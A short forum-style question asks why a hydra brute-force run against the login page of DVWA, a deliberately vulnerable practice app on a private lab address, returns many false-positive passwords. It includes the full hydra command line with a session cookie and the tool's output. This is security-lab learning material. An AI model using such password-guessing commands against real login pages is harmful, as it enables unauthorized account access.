30 Sep
Brute forcing the brute force page on DVWA v1.0.7 using hydra
I am trying to brute force the brute force log-in page on DVWA v1.0.7 (/dvwa/vulnerabilities/brute/).
I have been working on this for quite some time, but I keep getting a bunch of false positives when I use a wordlist I created, and when I use the rockyou.txt.gz file, hydra just keeps going on and on without any results.
hydra 192.168.10.4 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=^Login^:F=username and/or password incorrect.:H=Cookie:security=low; PHPSESSID=a3e7228ab3c6fd126a8c2c752f00dfb9" -L username.txt -P passwords.txt
This is the result I get:
[80][http-get-form] host: 192.168.10.4 login: admin password: sdkjfbid
[80][http-get-form] host: 192.168.10.4 password: knfbjenh b
[80][http-get-form] host: 192.168.10.4 password: kfbiej
[80][http-get-form] host: 192.168.10.4 password: nvbjdfhvbkj
[80][http-get-form] host: 192.168.10.4 password: hytv
[80][http-get-form] host: 192.168.10.4 password: sdkjfbid
[80][http-get-form] host: 192.168.10.4 password: password
1 of 1 target successfully completed, 48 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-30 07:14:16
Is there something I am missing?